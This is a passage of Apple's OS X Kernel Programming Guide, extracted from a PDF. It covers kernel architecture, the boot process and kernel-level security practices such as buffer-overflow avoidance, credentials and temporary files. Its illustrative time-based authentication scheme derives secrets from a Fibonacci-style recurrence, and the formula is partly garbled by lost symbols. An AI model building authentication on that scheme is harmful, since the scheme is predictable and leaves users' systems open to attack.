wide and diverse audience—specifically, the set of potential system software developers for OS X, including the following sorts of developers: ● device-driver writers ● network-extension writers ● file-system writers ● developers of software that modifies file system data on-the-fly ● system programmers familiar with BSD, Linux, and similar operating systems ● developers who want to learn about kernel programming If you fall into one of these categories, you may find this document helpful. It is important to stress the care needed when writing code that resides in the kernel, however, as noted in “Keep Out” (page 13). Road Map The goal of this document is to describe the various major components of OS X at a conceptual level, then provide more detailed programming information for developers working in each major area. It is divided into several parts. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 9 About This DocumentThe first part is a kernel programming overview, which discusses programming guidelines that apply to all aspects of kernel programming. This includes issues such as security, SMP safety, style, performance, and the OS X kernel architecture as a whole. This part contains the chapters “Keep Out” (page 13), “Kernel Architecture Overview” (page 14), “The Early Boot Process” (page 21), “Security Considerations” (page 24), “Performance Considerations” (page 39), and “Kernel Programming Style” (page 45). The next part describes Mach and the bootstrap task, including information about IPC, bootstrap contexts, ports and port rights, and so on. This includes the chapters “Mach Overview” (page 53), “Memory and Virtual Memory” (page 61), “Mach Scheduling and Thread Interfaces” (page 77), and “Bootstrap Contexts” (page 91). The third part describes the I/O Kit and BSD. The I/O Kit is described at only a high level, since it is primarily of interest to driver developers. The BSD subsystem is covered in more detail, including descriptions of BSD networking and file systems. This includes the chapters “I/O Kit Overview” (page 94), “BSD Overview” (page 101), “File Systems Overview” (page 106), and “Network Architecture” (page 108). The fourth part describes kernelservices, including boundary crossings,synchronization, queues, clocks, timers, shutdown hooks, and boot option handling. This includes the chapters “Boundary Crossings” (page 109), “Synchronization Primitives” (page 128), and “Miscellaneous Kernel Services” (page 142). The fifth part explains how to build and debug the kernel and kernel extensions. This includes the chapters “Kernel Extension Overview” (page 150) and “Building and Debugging Kernels” (page 155). Each part begins with an overview chapter or chapters, followed by chapters that address particular areas of interest. The document ends with a glossary of terms used throughout the preceding chapters as well as a bibliography which provides numerous pointers to other reference materials. Glossary terms are highlighted in bold when first used. While most terms are defined when they first appear, the definitions are all in the glossary for convenience. If a term seems familiar, it probably means what you think it does. If it’s unfamiliar, check the glossary. In any case, all readers may want to skim through the glossary, in case there are subtle differences between OS X usage and that of other operating systems. The goal of this document is very broad, providing a firm grounding in the fundamentals of OS X kernel programming for developers from many backgrounds. Due to the complex nature of kernel programming and limitations on the length of this document, however, it is not always possible to provide introductory material for developers who do not have at least some background in their area of interest. It is also not possible to cover every detail of certain parts of the kernel. If you run into problems, you should join the appropriate Darwin discussion list and ask questions. You can find the lists at http://www.lists.apple.com/. For this reason, the bibliography contains high-level references that should help familiarize you with some of the basic concepts that you need to understand fully the material in this document. About This Document Road Map 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 10This document is, to a degree, a reference document. The introductory sections should be easily read, and we recommend that you do so in order to gain a general understanding of each topic. Likewise, the first part of each chapter, and in many cases, of sections within chapters, will be tailored to providing a general understanding of individual topics. However, you should not plan to read this document cover to cover, but rather, take note of topics of interest so that you can refer back to them when the need arises. Other Apple Publications This document, Kernel Programming , is part of the Apple Reference Library. Be sure to read the first document in the series, Mac Technology Overview, if you are not familiar with OS X. You can obtain other documents from the Apple Developer Documentation website at http://developer.apple.com/documentation. Mach API Reference If you plan to do extensive work inside the OS X kernel, you may find it convenient to have a complete Mach API reference, since this document only documents the most common and useful portions of the Mach API. In order to better understand certain interfaces, it may also be helpful to study the implementations that led up to those used in OS X, particularly to fill in gaps in understanding of the fundamental principles of the implementation. OS X is based on the Mach 3.0 microkernel, designed by Carnegie Mellon University, and later adapted to the Power Macintosh by Apple and the Open Software Foundation Research Institute (now part of Silicomp). This was known as osfmk, and was part of MkLinux (http://www.mklinux.org). Later, this and code from OSF’s commercial development efforts were incorporated into Darwin’s kernel. Throughout this evolutionary process, the Mach APIs used in OS X diverged in many ways from the original CMU Mach 3 APIs. You may find older versions of the Mach source code interesting, both to satisfy historical curiosity and to avoid remaking mistakes made in earlier implementations. MkLinux maintains an active CVS repository with their recent versions of Mach kernel source code. Older versions can be obtained through various Internet sites. You can also find CMU Mach white papers by searching for Mach on the CMU computer science department’s website (http://www.cs.cmu.edu), along with various source code samples. Up-to-date versions of the Mach 3 APIsthat OS X provides are described in the Mach API reference in the kernel sources. The kernel sources can be found in the xnu project on http://kernel.macosforge.org/. About This Document Other Apple Publications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 11Information on the Web Apple maintains several websites where developers can go for general and technical information on OS X. ● Apple Developer Connection: Developer Documentation (http://developer.apple.com/documentation). Features the same documentation that is installed on OS X, except that often the documentation is more up-to-date. Also includes legacy documentation. ● Apple Developer Connection: OS X (http://developer.apple.com/devcenter/mac/). Offers SDKs, release notes, product notes and news, and other resources and information related to OS X. ● AppleCare Tech Info Library (http://www.apple.com/support/). Contains technical articles, tutorials, FAQs, technical notes, and other information. About This Document Information on the Web 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 12This document assumes a broad general understanding of kernel programming concepts. There are many good introductory operating systems texts. This is not one of them. For more information on basic operating systems programming, you should consider the texts mentioned in the bibliography at the end of this document. Many developers are justifiably cautious about programming in the kernel. A decision to program in the kernel is not to be taken lightly. Kernel programmers have a responsibility to users that greatly surpasses that of programmers who write user programs. Why You Should Avoid Programming in the Kernel Kernel code must be nearly perfect. A bug in the kernel could cause random crashes, data corruption, or even render the operating system inoperable. It is even possible for certain errant operations to cause permanent and irreparable damage to hardware, for example, by disabling the cooling fan and running the CPU full tilt. Kernel programming is a black art that should be avoided if at all possible. Fortunately, kernel programming is usually unnecessary. You can write most software entirely in user space. Even most device drivers (FireWire and USB, for example) can be written as applications, rather than as kernel code. A few low-level drivers must be resident in the kernel's address space, however, and this document might be marginally useful if you are writing drivers that fall into this category. Despite parts of this document being useful in driver writing, this is not a document about writing drivers. In OS X, you write device drivers using the I/O Kit. While this document covers the I/O Kit at a conceptual level, the details of I/O Kit programming are beyond the scope of this document. Driver writers are encouraged to read I/O Kit Fundamentals for detailed information about the I/O Kit. This document covers most aspects of kernel programmingwith the exception of device drivers. Covered topics include scheduling, virtual memory pagers and policies, Mach IPC, file systems, networking protocol stacks, process and thread management, kernel security, synchronization, and a number of more esoteric topics. To summarize, kernel programming is an immense responsibility. You must be exceptionally careful to ensure that your code does not cause the system to crash, does not provide any unauthorized user accessto someone else’s files or memory, does not introduce remote or local root exploits, and does not cause inadvertent data loss or corruption. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 13 Keep OutOS X provides many benefits to the Macintosh user and developer communities. These benefits include improved reliability and performance, enhanced networking features, an object-based system programming interface, and increased support for industry standards. In creatingOS X, Apple has completely re-engineered the MacOS core operating system. Forming the foundation of OS X is the kernel. Figure 3-1 (page 14) illustrates the OS X architecture. Figure 3-1 OS X architecture Carbon Cocoa BSD Java (JDK) Classic BSD Core Services Kernel environment Application Services QuickTime Application environment The kernel provides many enhancements for OS X. These include preemption, memory protection, enhanced performance, improved networking facilities, support for both Macintosh (Extended and Standard) and non-Macintosh (UFS, ISO 9660, and so on) file systems, object-oriented APIs, and more. Two of these features, preemption and memory protection, lead to a more robust environment. In Mac OS 9, applications cooperate to share processor time. Similarly, all applications share the memory of the computer among them. Mac OS 9 is a cooperative multitasking environment. The responsiveness of all processes is compromised if even a single application doesn’t cooperate. On the other hand, real-time applications such as multimedia need to be assured of predictable, time-critical, behavior. In contrast, OS X is a preemptive multitasking environment. In OS X, the kernel provides enforcement of cooperation,scheduling processesto share time (preemption). Thissupportsreal-time behavior in applications that require it. In OS X, processes do not normally share memory. Instead, the kernel assigns each process its own address space, controlling access to these address spaces. This control ensures that no application can inadvertently access or modify another application’s memory (protection). Size is not an issue; with the virtual memory system included in OS X, each application has access to its own 4 GB address space. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 14 Kernel Architecture OverviewViewed together, all applications are said to run in user space, but this does not imply that they share memory. User space is simply a term for the combined address spaces of all user-level applications. The kernel itself has its own address space, called kernel space. In OS X, no application can directly modify the memory of the system software (the kernel). Although user processes do not share memory by default as in Mac OS 9, communication (and even memory sharing) between applications is still possible. For example, the kernel offers a rich set of primitives to permit some sharing of information among processes. These primitives include shared libraries, frameworks, and POSIX shared memory. Mach messaging provides another approach, handing memory from one process to another. Unlike Mac OS 9, however, memory sharing cannot occur without explicit action by the programmer. Darwin The OS X kernel is an Open Source project. The kernel, along with other core parts of OS X are collectively referred to as Darwin. Darwin is a complete operating system based on many of the same technologies that underlie OS X. However, Darwin does not include Apple’s proprietary graphics or applications layers, such as Quartz, QuickTime, Cocoa, Carbon, or OpenGL. Figure 3-2 (page 15) shows the relationship between Darwin and OS X. Both build upon the same kernel, but OS X adds Core Services, Application Services and QuickTime, as well as the Classic, Carbon, Cocoa, and Java (JDK) application environments. Both Darwin and OS X include the BSD command-line application environment; however, in OS X, use of environment is not required, and thus it is hidden from the user unless they choose to access it. Figure 3-2 Darwin and OS X Carbon Cocoa BSD Java (JDK) Classic BSD Core Services Kernel environment Application Services QuickTime Application environment Darwin technology is based on BSD, Mach 3.0, and Apple technologies. Best of all, Darwin technology is Open Source technology, which meansthat developers have full accessto the source code. In effect, OS X third-party developers can be part of the Darwin core system software development team. Developers can also see how Apple is doing thingsin the core operating system and adopt (or adapt) code to use within their own products. Refer to the Apple Public Source License (APSL) for details. Kernel Architecture Overview Darwin 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 15Because the same software forms the core of both OS X and Darwin, developers can create low-level software that runs on both OS X and Darwin with few, if any, changes. The only difference is likely to be in the way the software interacts with the application environment. Darwin is based on proven technology from many sources. A large portion of this technology is derived from FreeBSD, a version of 4.4BSD that offers advanced networking, performance,security, and compatibility features. Other parts of the system software, such as Mach, are based on technology previously used in Apple’s MkLinux project, in OS X Server, and in technology acquired from NeXT. Much of the code is platform-independent. All of the core operating-system code is available in source form. The core technologies have been chosen for several reasons. Mach provides a clean set of abstractions for dealing with memory management, interprocess(and interprocessor) communication (IPC), and other low-level operating-system functions. In today’s rapidly changing hardware environment, this provides a useful layer of insulation between the operating system and the underlying hardware. BSD is a carefully engineered, mature operating system with many capabilities. In fact, most of today’s commercial UNIX and UNIX-like operating systems contain a great deal of BSD code. BSD also provides a set of industry-standard APIs. New technologies,such asthe I/OKit and Network Kernel Extensions(NKEs), have been designed and engineered by Apple to take advantage of advanced capabilities,such asthose provided by an object-oriented programming model. OS X combines these new technologies with time-tested industry standards to create an operating system that is stable, reliable, flexible, and extensible. Architecture The foundation layer of Darwin and OS X is composed of several architectural components, as shown in Figure 3-3 (page 16). Taken together, these components form the kernel environment. Figure 3-3 OS X kernel architecture Common services Kernel environment Application environments Mach File system BSD Networking NKE Drivers I/O Kit Kernel Architecture Overview Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 16Important: Note that OS X uses the term kernel somewhat differently than you might expect. “A kernel, in traditional operating-system terminology, is a small nucleus of software that provides only the minimal facilities necessary for implementing additional operating-system services.” — from The Design and Implementation of the 4.4 BSD Operating System, McKusick, Bostic, Karels, and Quarterman, 1996. Similarly, in traditional Mach-based operating systems, the kernel refers to the Mach microkernel and ignores additional low-level code without which Mach does very little. In OS X, however, the kernel environment contains much more than the Mach kernel itself. The OS X kernel environment includes the Mach kernel, BSD, the I/O Kit, file systems, and networking components. These are often referred to collectively as the kernel. Each of these components is described briefly in the following sections. For further details, refer to the specific component chapters or to the reference material listed in the bibliography. Because OS X contains three basic components (Mach, BSD, and the I/O Kit), there are also frequently as many as three APIs for certain key operations. In general, the API chosen should match the part of the kernel where it is being used, which in turn is dictated by what your code is attempting to do. The remainder of this chapter describes Mach, BSD, and the I/O Kit and outlines the functionality that is provided by those components. Mach Mach manages processor resources such as CPU usage and memory, handles scheduling, provides memory protection, and provides a messaging-centered infrastructure to the rest of the operating-system layers. The Mach component provides ● untyped interprocess communication (IPC) ● remote procedure calls (RPC) ● scheduler support for symmetric multiprocessing (SMP) ● support for real-time services ● virtual memory support ● support for pagers ● modular architecture General information about Mach may be found in the chapter “Mach Overview” (page 53). Information about scheduling can be found in the chapter “Mach Scheduling and Thread Interfaces” (page 77). Information about the VM system can be found in “Memory and Virtual Memory” (page 61). Kernel Architecture Overview Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 17BSD Above the Mach layer, the BSD layer provides “OS personality” APIs and services. The BSD layer is based on the BSD kernel, primarily FreeBSD. The BSD component provides ● file systems ● networking (except for the hardware device level) ● UNIX security model ● syscall support ● the BSD process model, including process IDs and signals ● FreeBSD kernel APIs ● many of the POSIX APIs ● kernel support for pthreads (POSIX threads) The BSD component is described in more detail in the chapter “BSD Overview” (page 101). Networking OS X networking takes advantage of BSD’s advanced networking capabilities to provide support for modern features, such as Network Address Translation (NAT) and firewalls. The networking component provides ● 4.4BSD TCP/IP stack and socket APIs ● support for both IP and DDP (AppleTalk transport) ● multihoming ● routing ● multicast support ● server tuning ● packet filtering ● Mac OS Classic support (through filters) More information about networking may be found in the chapter “Network Architecture” (page 108). Kernel Architecture Overview Architecture 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 18File Systems OS X providessupport for numeroustypes of file systems, including HFS, HFS+, UFS, NFS, ISO 9660, and others. The default file-system type is HFS+; OS X boots (and “roots”) from HFS+, UFS, ISO, NFS, and UDF. Advanced features of OS X file systems include an enhanced Virtual File System (VFS) design. VFS provides for a layered architecture (file systems are stackable). The file system component provides ● UTF-8 (Unicode) support ● increased performance over previous versions of Mac OS. More information may be found in the chapter “File Systems Overview” (page 106). I/O Kit The I/O Kit provides a framework forsimplified driver development,supporting many categories of devices.The I/O Kit features an object-oriented I/O architecture implemented in a restricted subset of C++. The I/O Kit framework is both modular and extensible. The I/O Kit component provides ● true plug and play ● dynamic device management ● dynamic (“on-demand”) loading of drivers ● power management for desktop systems as well as portables ● multiprocessor capabilities The I/O Kit is described in greater detail in the chapter “I/O Kit Overview” (page 94). Kernel Extensions OS X provides a kernel extension mechanism as a means of allowing dynamic loading of pieces of code into kernel space, without the need to recompile. These pieces of code are known generically as plug-ins or, in the OS X kernel environment, as kernel extensions or KEXTs. Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to interfaces that are not exported to user space. Many of the components of the kernel environment support this extension mechanism, though they do so in different ways. For example, some of the new networking features involve the use of network kernel extensions (NKEs). These are discussed in the chapter “Network Architecture” (page 108). Kernel Architecture Overview Kernel Extensions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 19The ability to dynamically add a new file-system implementation is based on VFS KEXTs. Device drivers and device familiesin the I/O Kit are implemented using KEXTs. KEXTs make development much easier for developers writing drivers or those writing code to support a new volume format or networking protocol. KEXTs are discussed in more detail in the chapter “Kernel Extension Overview” (page 150). Kernel Architecture Overview Kernel Extensions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 20Boot ROM When the power to a Macintosh computer is turned on, the BootROM firmware is activated. BootROM (which is part of the computer’s hardware) hastwo primary responsibilities: it initializessystem hardware and itselects an operating system to run. BootROM has two components to help it carry out these functions: ● POST (Power-On Self Test) initializes some hardware interfaces and verifies that sufficient memory is available and in a good state. ● EFI does basic hardware initialization and selects which operating system to use. If multiple installations of OS X are available, BootROM chooses the one that was last selected by the Startup Disk System Preference. The user can override this choice by holding down the Option key while the computer boots, which causes EFI to display a screen for choosing the boot volume. The Boot Loader Once BootROM is finished and an OS X partition has been selected, control passes to the boot.efi boot loader. The principal job of this boot loader is to load the kernel environment. As it does this, the boot loader draws the “booting” image on the screen. If full-disk encryption is enabled, the boot loader is responsible for drawing the login UI and prompting for the user’s password, which needed to accessthe encrypted disk to boot from it. (This UI is drawn by loginwindow otherwise.) In the simplest case, the boot loader can be found in the /System/Library/CoreServices directory on the root partition, in a file named boot.efi. Note: Booting from a UFS volume is deprecated as of OS X v10.5. In order to speed up boot time, the boot loader uses several caches. The contents and location of these caches varies between versions of OS X, but knowing some details about the caching may be helpful when debugging kernel extensions. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 21 The Early Boot ProcessAfter you install or modify a kernel extension, touch the /System/Library/Extensions directory; the system rebuilds the caches automatically. Important: You should not depend on the implementation details of the kernel caches in your software. In OS X v10.7, the boot loader looks for the unified prelinked kernel. This cache contains all kernel extensions that may be needed to boot a Mac with any hardware configuration, with the extensions already linked against the kernel. It islocated at /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache. In OS X v10.6 and earlier, the boot loader first looks for the prelinked kernel (also called the kernel cache). This cache contains exactly the set of kernel extensions that were needed during the previous system startup, already linked against the kernel. If the prelinked kernel is missing or unusable (for example, because a hardware configuration has changed), the booter looks for the mkext cache, which contains all kernel extensions that may be needed to boot the system. Using the mkext cache is much slower because the linker must be run. On OS X v10.5 and v10.6, these caches are located in /System/Library/Caches/com.apple.kext.caches/Startup/; on previous versions of OS X, it was located at /System/Library/Caches/com.apple.kernelcaches/. Finally, if the caches cannot be used, the boot loader searches /System/Library/Extensions for drivers and other kernel extensions whose OSBundleRequired property is set to a value appropriate to the type of boot (for example, local or network boot). This process is very slow, because the Info.plist file of every kernel extension must be parsed, and then the linker must be run. For more information on how drivers are loaded, see I/O Kit Fundamentals, the manual page for kextcache, and Kernel Extension Programming Topics. Rooting Once the kernel and all drivers necessary for booting are loaded, the boot loaderstartsthe kernel’sinitialization procedure. At this point, enough drivers are loaded for the kernel to find the root device. The kernel initializes the Mach and BSD data structures and then initializes the I/O Kit. The I/O Kit links the loaded drivers into the kernel, using the device tree to determine which drivers to link. Once the kernel finds the root device, it roots(*) BSD off of it. The Early Boot Process Rooting 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 22Note: As a terminology aside, the term “boot” was historically reserved for loading a bootstrap loader and kernel off of a disk or partition. In more recent years, the usage has evolved to allow a second meaning: the entire process from initial bootstrap until the OS is generally usable by an end user. In this case, the term is used according to the former meaning. As used here, the term “root” refersto mounting a partition asthe root, or top-level, filesystem. Thus, while the OS boots off of the root partition, the kernel rootsthe OS off of the partition before executing startup scripts from it. Boot≠Root is a technology that allows the system to boot from a partition other than the root partition. This is used to boot systems where the root partition is encrypted using full-disk encryption, or where the root partition islocated on a device which requires additional drivers(such as a RAID array). Boot≠Root uses a helper partition to store the files needed to boot, such as the kernel cache. For more information on how to set up the property in a filter-scheme driver,see “Developing a Filter Scheme” in Mass StorageDeviceDriver Programming Guide . The Early Boot Process Rooting 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 23Kernel-level security can mean many things, depending on what kind of kernel code you are writing. This chapter points out some common security issues at the kernel or near-kernel level and where applicable, describes ways to avoid them. These issues are covered in the following sections: ● “Security Implications of Paging” (page 25) ● “Buffer Overflows and Invalid Input” (page 26) ● “User Credentials” (page 27) ● “Remote Authentication” (page 29) ● “Temporary Files” (page 31) ● “/dev/mem and /dev/kmem” (page 31) ● “Key-based Authentication and Encryption” (page 32) ● “Console Debugging” (page 36) ● “Code Passing” (page 37) Many of these issues are also relevant for application programming, but are crucial for programmers working in the kernel. Others are special considerations that application programers might not expect or anticipate. Note: The terms cleartext and plaintext both refer to unencrypted text. These terms can generally be used interchangeably, although in some circles, the term cleartext is restricted to unencrypted transmission across a network. However, in other circles, the term plaintext (orsometimes plain text) refers to plain ASCII text (as opposed to HTML or rich text. To avoid any potential confusion, this chapter will use the term cleartext to refer to unencrypted text. In order to understand security in OS X, it is important to understand that there are two security models at work. One of these is the kernel security model, which is based on users, groups, and very basic per-user and per-group rights, which are, in turn, coupled with access control lists for increased flexibility. The other is a user-level security model, which is based on keys, keychains, groups, users, password-based authentication, and a host of other details that are beyond the scope of this document. The user level of security contains two basic features that you should be aware of as a kernel programmer: Security Server and Keychain Manager. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 24 Security ConsiderationsThe Security Server consists of a daemon and various accesslibrariesfor caching permission to do certain tasks, based upon various means of authentication, including passwords and group membership. When a program requests permission to do something, the Security Server basically says “yes” or “no,” and caches that decision so that further requestsfrom that user (forsimilar actions within a single context) do not require reauthentication for a period of time. The Keychain Manager is a daemon that provides services related to the keychain, a central repository for a user’s encryption/authentication keys. For more high level information on keys,see “Key-based Authentication and Encryption” (page 32). The details of the user-level security model use are far beyond the scope of this document. However, if you are writing an application that requires services of this nature, you should consider taking advantage of the Security Server and Keychain Manager from the user-space portion of your application, rather than attempting equivalent services in the kernel. More information about these services can be found in Apple’s Developer Documentation website at http://developer.apple.com/documentation. Security Implications of Paging Paging has long been a major problem for security-conscious programmers. If you are writing a program that does encryption, the existence of even a small portion of the cleartext of a document in a backing store could be enough to reduce the complexity of breaking that encryption by orders of magnitude. Indeed, many types of data,such as hashes, unencrypted versions ofsensitive data, and authentication tokens, should generally not be written to disk due to the potential for abuse. This raises an interesting problem. There is no good way to deal with this in user space (unless a program is running as root). However, for kernel code, it is possible to prevent pages from being written out to a backing store. This process is referred to as “wiring down” memory, and is described further in “Memory Mapping and Block Copying” (page 125). The primary purpose of wired memory is to allow DMA-based I/O. Since hardware DMA controllers generally do not understand virtual addressing, information used in I/O must be physically in memory at a particular location and must not move until the I/O operation is complete. This mechanism can also be used to prevent sensitive data from being written to a backing store. Because wired memory can never be paged out (until it is unwired), wiring large amounts of memory has drastic performance repercussions, particularly on systems with small amounts of memory. For this reason, you should take care not to wire down memory indiscriminately and only wire down memory if you have a very good reason to do so. In OS X, you can wire down memory at allocation time or afterwards. To wire memory at allocation time: ● In I/O Kit, call IOMalloc and IOFree to allocate and free wired memory. Security Considerations Security Implications of Paging 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 25● In other kernel extensions, call OSMalloc and OSFree and pass a tag type whose flags are set to OSMT_DEFAULT. ● In user space code, allocate page-sized quantities with your choice of API, and then call mlock(2) to wire them. ● Inside the kernel itself (not in kernel extensions), you can also use kmem_alloc and related functions. For more information on wired memory, see “Memory Mapping and Block Copying” (page 125). Buffer Overflows and Invalid Input Buffer overflows are one of the more common bugs in both application and kernel programming. The most common cause is failing to allocate space for the NULL character that terminates a string in C or C++. However, user input can also cause buffer overflows if fixed-size input buffers are used and appropriate care is not taken to prevent overflowing these buffers. The most obvious protection, in this case, is the best one. Either don’t use fixed-length buffers or add code to reject or truncate input that overflows the buffer. The implementation details in either case depend on the type of code you are writing. For example, if you are working with strings and truncation is acceptable, instead of using strcpy, you should use strlcpy to limit the amount of data to copy. OS X provides length-limited versions of a number of string functions, including strlcpy, strlcat, strncmp, snprintf, and vsnprintf. If truncation of data is not acceptable, you must explicitly call strlen to determine the length of the input string and return an error if it exceeds the maximum length (one less than the buffer size). Other types of invalid input can be somewhat harder to handle, however. As a general rule, you should be certain that switch statements have a default case unless you have listed every legal value for the width of the type. A common mistake is assuming that listing every possible value of an enum type provides protection. An enum is generally implemented as either a char or an int internally. A careless or malicious programmer could easily pass any value to a kernel function, including those not explicitly listed in the type, simply by using a different prototype that defines the parameter as, for example, an int. Another common mistake is to assume that you can dereference a pointer passed to your function by another function. You should always check for null pointers before dereferencing them. Starting a function with int do_something(bufptr *bp, int flags) { Security Considerations Buffer Overflows and Invalid Input 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 26char *token = bp->b_data; isthe surest way to guarantee thatsomeone else will passin a null buffer pointer, either maliciously or because of programmer error. In a user program, this is annoying. In a file system, it is devastating. Security is particularly important for kernel code that draws input from a network. Assumptions about packet size are frequently the cause of security problems. Always watch for packets that are too big and handle them in a reasonable way. Likewise, always verify checksums on packets. This can help you determine if a packet was modified, damaged, or truncated in transit, though it is far from foolproof. If the validity of data from a network is of vital importance, you should use remote authentication, signing, and encryption mechanisms such as those described in “Remote Authentication” (page 29) and “Key-based Authentication and Encryption” (page 32). User Credentials As described in the introduction to this chapter, OS X has two different means of authenticating users. The user-levelsecurity model (including the Keychain Manager and the Security Server) is beyond the scope of this document. The kernel security model, however, is of greater interest to kernel developers, and is much more straightforward than the user-level model. The kernel security model is based on two mechanisms: basic user credentials and ACL permissions. The first, basic user credentials, are passed around within the kernel to identify the current user and group of the calling process. The second authentication mechanism, access control lists (ACLs), provides access control at a finer level of granularity. One of the most important things to remember when working with credentials is that they are per process, not per context. This is important because a process may not be running as the console user. Two examples of this are processes started from an ssh session (since ssh runs in the startup context) and setuid programs (which run as a different user in the same login context). It is crucial to be aware of these issues. If you are communicating with a setuid root GUI application in a user’s login context, and if you are executing another application or are reading sensitive data, you probably want to treat it as if it had the same authority as the console user, not the authority of the effective user ID caused by running setuid. This is particularly problematic when dealing with programs that run as setuid root if the console user is not in the admin group. Failure to perform reasonable checks can lead to major security holes down the road. However, this is not a hard and fast rule. Sometimes it is not obvious whether to use the credentials of the running process or those of the console user. In such cases, it is often reasonable to have a helper application show a dialog box on the console to require interaction from the console user. If this is not possible, a good Security Considerations User Credentials 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 27rule of thumb is to assume the lesser of the privileges of the current and console users, as it is almost always better to have kernel code occasionally fail to provide a needed service than to provide that service unintentionally to an unauthorized user or process. It is generally easier to determine the console user from a user space application than from kernel space code. Thus, you should generally do such checks from user space. If that is not possible, however, the variable console_user (maintained by the VFS subsystem) will give you the uid of the last owner of /dev/console (maintained by a bit of code in the chown system call). Thisis certainly not an idealsolution, but it does provide the most likely identity of the console user. Since this is only a “best guess,” however, you should use this only if you cannot do appropriate checking in user space. Basic User Credentials Basic user credentials used in the kernel are stored in a variable of type struct ucred. These are mostly used in specialized parts of the kernel—generally in places where the determining factor in permissions is whether or not the caller is running as the root user. This structure has four fields: ● cr_ref—reference count (used internally) ● cr_uid—user ID ● cr_ngroups—number of groups in cr_groups ● cr_groups[NGROUPS]—list of groups to which the user belongs Thisstructure has an internal reference counter to prevent unintentionally freeing the memory associated with it while it is still in use. For this reason, you should not indiscriminately copy this object but should instead either use crdup to duplicate it or use crcopy to duplicate it and (potentially) free the original. You should be sure to crfree any copies you might make. You can also create a new, empty ucred structure with crget. The prototypes for these functions follow: ● struct ucred *crdup(struct ucred *cr) ● struct ucred *crcopy(struct ucred *cr) ● struct ucred *crget(void) ● void crfree(struct ucred *cr) Security Considerations User Credentials 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 28Note: Functions for working with basic user credential are not exported outside of the kernel, and thus are not generally available to kernel extensions. Access Control Lists Access control lists are a new feature in OS X v10.4. Access control lists are primarily used in the file system portion of the OS X kernel, and are supported through the use of the kauth API. The kauth API is described in the header file /System/Library/Frameworks/Kernel.framework/Headers/sys/kauth.h. Because this API is still evolving, detailed documentation is not yet available. Remote Authentication This is one of the more difficult problems in computer security: the ability to identify someone connecting to a computer remotely. One of the mostsecure methodsisthe use of public key cryptography, which is described in more detail in “Key-based Authentication and Encryption” (page 32). However, many other means of authentication are possible, with varying degrees of security. Some other authentication schemes include: ● blind trust ● IP-only authentication ● password (shared secret) authentication ● combination of IP and password authentication ● one-time pads (challenge-response) ● time-based authentication Most of these are obvious, and require no further explanation. However, one-time pads and time-based authentication may be unfamiliar to many people outside security circles, and are thus worth mentioning in more detail. Security Considerations Remote Authentication 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 29One-Time Pads Based on the concept of “challenge-response” pairs, one-time pad (OTP) authentication requires that both parties have an identical list of pairs of numbers, words, symbols, or whatever, sorted by the first item. When trying to access a remote system, the remote system prompts the user with a challenge. The user finds the challenge in the first column, then sends back the matching response. Alternatively, this could be an automated exchange between two pieces of software. For maximum security, no challenge should ever be issued twice. For this reason, and because these systems were initially implemented with a paper pad containing challenge-response, or CR pairs, such systems are often called one-time pads. The one-time nature of OTP authentication makesit impossible forsomeone to guessthe appropriate response to any one particular challenge by a brute force attack (by responding to that challenge repeatedly with different answers). Basically, the only way to break such a system, short of a lucky guess, is to actually know some portion of the contents of the list of pairs. For this reason, one-time pads can be used over insecure communication channels. If someone snoops the communication, they can obtain that challenge-response pair. However, that information is of no use to them, since that particular challenge will never be issued again. (It does not even reduce the potential sample space for responses, since only the challenges must be unique.) Time-based authentication Thisis probably the least understood means of authentication, though it is commonly used by such technologies as SecurID. The concept isrelatively straightforward. You begin with a mathematical function that takes a small number of parameters (two, for example) and returns a new parameter. A good example of such a function is the function that generates the set of Fibonacci numbers (possibly truncated after a certain number of bits, with arbitrary initial seed values). Take this function, and add a third parameter, t, representing time in units of k seconds. Make the function be a generating function on t, with two seed values, a and b, where f(x,y) = (x + y) MOD (2 32 ) g(t) = a, 0 t k g(t) = b, k t 2k g(t) = f (g( log k t -2),g( log k t -1)) Security Considerations Remote Authentication 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 30In other words, every k seconds, you calculate a new value based on the previous two and some equation. Then discard the oldest value, replacing it with the second oldest value, and replace the second oldest value with the value that you just generated. As long as both ends have the same notion of the current time and the original two numbers, they can then calculate the most recently generated number and use this as a shared secret. Of course, if you are writing code that does this, you should use a closed form of this equation, since calculating Fibonacci numbers recursively without additional storage grows at O(2^(t/k)), which is not practical when t is measured in years and k is a small constant measured in seconds. The security ofsuch a scheme depends on various properties of the generator function, and the details ofsuch a function are beyond the scope of this document. For more information, you should obtain an introductory text on cryptography,. such as Bruce Schneier’s Applied Cryptography . Temporary Files Temporary files are a major source of security headaches. If a program does not set permissions correctly and in the right order, this can provide a means for an attacker to arbitrarily modify or read these files. The security impact of such modifications depends on the contents of the files. Temporary files are of much less concern to kernel programmers,since most kernel code does not use temporary files. Indeed, kernel code should generally not use files at all. However, many people programming in the kernel are doing so to facilitate the use of applicationsthat may use temporary files. Assuch, thisissue is worth noting. The most common problem with temporary files is that it is often possible for a malicious third party to delete the temporary file and substitute a different one with relaxed permissions in its place. Depending on the contents of the file, this could range from being a minor inconvenience to being a relatively large security hole, particularly if the file contains a shell script that is about to be executed with the permissions of the 